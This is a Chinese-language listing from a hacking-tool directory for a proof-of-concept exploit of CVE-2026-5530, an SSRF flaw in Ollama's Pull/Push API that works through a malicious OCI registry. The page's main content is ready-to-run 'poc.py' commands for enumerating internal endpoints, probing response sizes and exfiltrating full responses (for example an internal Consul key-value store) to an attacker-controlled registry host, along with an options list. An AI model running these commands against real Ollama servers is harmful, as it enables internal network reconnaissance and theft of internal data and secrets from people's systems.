Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5530 — CVE-2026-5530 的概念验证漏洞利用程序,针对 Ollama 的 Pull/Push API 中的 SSRF 漏洞,可通过恶意 OCI 注册表实现内部端点枚举及完整响应数据外泄。 | Kitploit
工具/GitHubGitHub/davidrxchester/cve-2026-5530
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

CVE-2026-5530 的概念验证漏洞利用程序,针对 Ollama 的 Pull/Push API 中的 SSRF 漏洞,可通过恶意 OCI 注册表实现内部端点枚举及完整响应数据外泄。

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-5530

通过 OCI 注册表重定向实现 Ollama SSRF,并完整外泄响应数据。

技术文章:https://davidrochester.com/posts/cve-2026-5530

披露

已多次联系 Ollama,但均未收到回复。

用法

三种模式:枚举(enum)、外泄(exfil)和探测(probe)。

枚举

发现可从 Ollama 主机访问的内部存活端点。

root@kitploit:~
python3 poc.py targets.txt --registry-host <your-ip>

外泄

在已知响应大小的情况下,外泄 SSRF 响应。

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

探测

自动二分搜索响应大小,然后进行外泄。

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

选项

root@kitploit:~
target              目标 URL 或 URL 文件(每行一个,# 表示注释)
-p, --port           恶意注册表端口(默认:9999)
--exfil-port         外泄注册表端口(默认:10000)
--exfil              外泄模式,需要 --size
--probe              二分搜索大小,然后外泄
--size               Content-Length(与 --exfil 一起使用)
--registry-host      你的攻击者 IP/主机名,Ollama 可访问
--ollama             Ollama API URL(默认:http://127.0.0.1:11434)
下载工具